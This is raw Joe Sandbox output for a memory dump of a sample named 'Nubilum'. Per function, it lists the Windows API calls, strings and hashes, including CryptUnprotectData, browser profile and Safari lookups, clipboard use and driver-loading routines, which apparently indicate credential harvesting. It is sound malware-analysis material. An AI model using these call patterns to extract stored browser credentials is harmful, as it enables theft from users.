                          • Instruction ID: 98d7c88e32de7b71128496fa216618f30369d33ff21347cb3a36463818225643
                          • Opcode Fuzzy Hash: a0780bb49d8a07aeac5707b5a6201decdf5b3787da807124ae81a49ee348ef3f
                          • Instruction Fuzzy Hash: A7012B327009226BD700AB29AC41A4AB3D8EFD4314B16402FF508D7341EF78EC114BD8
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID:
                          • API String ID: 2081463915-0
                          • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                          • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                          APIs
                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastRead
                          • String ID:
                          • API String ID: 2136311172-0
                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                          APIs
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@??3@
                          • String ID:
                          • API String ID: 1936579350-0
                          • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                          • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                          APIs
                          • EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                          • GetLastError.KERNEL32 ref: 0040995D
                          • CloseHandle.KERNEL32(?), ref: 00409969
                          • GetLastError.KERNEL32 ref: 00409974
                          • CloseClipboard.USER32 ref: 0040997D
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                          • String ID:
                          • API String ID: 2565263379-0
                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                          APIs
                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadMessageProc
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 2780580303-317687271
                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                          APIs
                          • EmptyClipboard.USER32 ref: 00409882
                          • wcslen.MSVCRT ref: 0040988F
                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                          • memcpy.MSVCRT ref: 004098B5
                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                          • CloseClipboard.USER32 ref: 004098D7
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                          • String ID:
                          • API String ID: 2014503067-0
                          • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                          • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                          APIs
                          • GetLastError.KERNEL32 ref: 004182D7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                          • LocalFree.KERNEL32(?), ref: 00418342
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                          • String ID: OsError 0x%x (%u)
                          • API String ID: 403622227-2664311388
                          • Opcode ID: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                          • Opcode Fuzzy Hash: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                          APIs
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                          • OpenClipboard.USER32(?), ref: 00411878
                          • GetLastError.KERNEL32 ref: 0041188D
                          • DeleteFileW.KERNEL32(?), ref: 004118AC
                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                            • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                            • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                          • String ID:
                          • API String ID: 1203541146-0
                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                          APIs
                          • _wcsicmp.MSVCRT ref: 004022A6
                          • _wcsicmp.MSVCRT ref: 004022D7
                          • _wcsicmp.MSVCRT ref: 00402305
                          • _wcsicmp.MSVCRT ref: 00402333
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                          • memset.MSVCRT ref: 0040265F
                          • memcpy.MSVCRT ref: 0040269B
                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • memcpy.MSVCRT ref: 004026FF
                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                          • API String ID: 2929817778-1134094380
                          • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                          • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                          • String ID: :stringdata$ftp://$http://$https://
                          • API String ID: 2787044678-1921111777
                          • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                          • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                          • GetWindowRect.USER32(?,?), ref: 00414088
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                          • GetDC.USER32 ref: 004140E3
                          • wcslen.MSVCRT ref: 00414123
                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                          • ReleaseDC.USER32(?,?), ref: 00414181
                          • _snwprintf.MSVCRT ref: 00414244
                          • SetWindowTextW.USER32(?,?), ref: 00414258
                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                          • GetClientRect.USER32(?,?), ref: 004142E1
                          • GetWindowRect.USER32(?,?), ref: 004142EB
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                          • GetClientRect.USER32(?,?), ref: 0041433B
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 2080319088-3046471546
                          • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                          • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                          APIs
                          • EndDialog.USER32(?,?), ref: 00413221
                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                          • memset.MSVCRT ref: 00413292
                          • memset.MSVCRT ref: 004132B4
                          • memset.MSVCRT ref: 004132CD
                          • memset.MSVCRT ref: 004132E1
                          • memset.MSVCRT ref: 004132FB
                          • memset.MSVCRT ref: 00413310
                          • GetCurrentProcess.KERNEL32 ref: 00413318
                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                          • memset.MSVCRT ref: 004133C0
                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                          • memcpy.MSVCRT ref: 004133FC
                          • wcscpy.MSVCRT ref: 0041341F
                          • _snwprintf.MSVCRT ref: 0041348E
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                          • SetFocus.USER32(00000000), ref: 004134B7
                          Strings
                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                          • {Unknown}, xrefs: 004132A6
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                          • API String ID: 4111938811-1819279800
                          • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                          • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                          • EndDialog.USER32(?,?), ref: 0040135E
                          • DeleteObject.GDI32(?), ref: 0040136A
                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                          • ShowWindow.USER32(00000000), ref: 00401398
                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                          • ShowWindow.USER32(00000000), ref: 004013A7
                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                          • String ID:
                          • API String ID: 829165378-0
                          • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                          • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                          APIs
                          • memset.MSVCRT ref: 00404172
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 004041D6
                          • wcscpy.MSVCRT ref: 004041E7
                          • memset.MSVCRT ref: 00404200
                          • memset.MSVCRT ref: 00404215
                          • _snwprintf.MSVCRT ref: 0040422F
                          • wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 0040426E
                          • memset.MSVCRT ref: 004042CD
                          • memset.MSVCRT ref: 004042E2
                          • _snwprintf.MSVCRT ref: 004042FE
                          • wcscpy.MSVCRT ref: 00404311
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                          • API String ID: 2454223109-1580313836
                          • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                          • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
